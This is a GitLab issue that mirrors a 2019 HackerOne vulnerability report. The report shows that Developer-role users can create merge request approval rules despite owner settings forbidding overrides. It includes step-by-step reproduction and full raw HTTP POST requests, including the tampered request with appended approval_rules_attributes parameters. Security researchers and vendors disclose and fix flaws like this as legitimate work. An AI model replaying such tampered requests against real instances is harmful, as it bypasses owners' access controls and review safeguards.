Override approvers and approvals required per merge request despite no permissions (#11423) · Issues · GitLab.org / GitLab

Override approvers and approvals required per merge request despite no permissions

**[HackerOne report #544756](https://hackerone.com/reports/544756)** by `ashish_r_padelkar` on 2019-04-21, assigned to `estrike`: ### Summary Hello, Owner/Maintainer of the project may prevent overriding of approvers and approvals required per merge request by having the below settings in project settings ![Screenshot_2019-04-22_at_00.28.49.png](https://h1.sec.gitlab.net/a/544756/473362/Screenshot_2019-04-22_at_00.28.49.png) However, `Developer` users can still create new approval rules per merge request! ### Steps to reproduce 1. As a project owner , set a settings like below for merge request approval rule ![Screenshot_2019-04-22_at_00.28.49.png](https://h1.sec.gitlab.net/a/544756/473362/Screenshot_2019-04-22_at_00.28.49.png) 2. As a `Developer` user in a project, go to any merge request and EDIT it. once it reloads, you see that you can not EDIT or Create new approval rules. 3. Without doing anything else, just click on save and capture the below request ``` POST /PrivateGroupofGuest/project2/merge_requests/2 HTTP/1.1 Host: gitlab.com Connection: close Content-Length: 542 Cache-Control: max-age=0 Origin: https://gitlab.com Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Referer: https://gitlab.com/PrivateGroupofGuest/project2/merge_requests/2/edit Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: _gitlab_session=1; event_filter=all; sidebar_collapsed=false utf8=%E2%9C%93&_method=patch&authenticity_token=1&merge_request%5Btitle%5D=ExampleMergeRequest&merge_request%5Bdescription%5D=Closes+%233&merge_request%5Bassignee_id%5D=&merge_request%5Bmilestone_id%5D=847953&merge_request%5Blabel_ids%5D%5B%5D=&merge_request%5Blabel_ids%5D%5B%5D=10328587&merge_request%5Btarget_branch%5D=master&merge_request%5Bforce_remove_source_branch%5D=0&merge_request%5Bsquash%5D=0&merge_request%5Block_version%5D= ``` 4. Append below parameters in the above request ``` &merge_request[approval_rules_attributes][][name]=ThisIsCreatedDespiteSettingsByOnwer&merge_request[approval_rules_attributes][][user_ids][]=3148078&merge_request[approval_rules_attributes][][approvals_required]=1 ``` Where as `3148078` is my user ID, you may try adding yours if mine doesnt work for you. 5. So the final request would be like ``` POST /PrivateGroupofGuest/project2/merge_requests/2 HTTP/1.1 Host: gitlab.com Connection: close Content-Length: 542 Cache-Control: max-age=0 Origin: https://gitlab.com Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Referer: https://gitlab.com/PrivateGroupofGuest/project2/merge_requests/2/edit Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: _gitlab_session=1; event_filter=all; sidebar_collapsed=false utf8=%E2%9C%93&_method=patch&authenticity_token=1&merge_request%5Btitle%5D=WIP%3A+Resolve+%22yyyy%22&merge_request%5Bdescription%5D=Closes+%233&merge_request%5Bassignee_id%5D=&merge_request%5Bmilestone_id%5D=847953&merge_request%5Blabel_ids%5D%5B%5D=&merge_request%5Blabel_ids%5D%5B%5D=10328587&merge_request%5Btarget_branch%5D=master&merge_request%5Bforce_remove_source_branch%5D=0&merge_request%5Bsquash%5D=0&merge_request%5Block_version%5D=&merge_request[approval_rules_attributes][][name]=ThisIsCreatedDespiteSettingsByOnwer&merge_request[approval_rules_attributes][][user_ids][]=3148078&merge_request[approval_rules_attributes][][approvals_required]=1 ``` 6. Send this request. Once done, click on EDIT merge request again and scroll down to approval rules. 7. Now you should see the approval rule created despite it was not allowed by owners! ![Screenshot_2019-04-22_at_00.31.04.png](https://h1.sec.gitlab.net/a/544756/473363/Screenshot_2019-04-22_at_00.31.04.png) ### What is the current *bug* behavior? Developer can override the merge request approval rules despite settings by owner! ### What is the expected *correct* behavior? Developer should not be allowed to create approval rule when owner isnt allowing to create ### Output of checks This bug happens on GitLab.com and probably on omnibus installations too! Regards, Ashish ## Impact Developers can override approval rule settings ## Attachments **Warning:** Attachments received through HackerOne, please exercise caution! * [Screenshot_2019-04-22_at_00.28.49.png](https://h1.sec.gitlab.net/a/544756/473362/Screenshot_2019-04-22_at_00.28.49.png) * [Screenshot_2019-04-22_at_00.31.04.png](https://h1.sec.gitlab.net/a/544756/473363/Screenshot_2019-04-22_at_00.31.04.png)

issue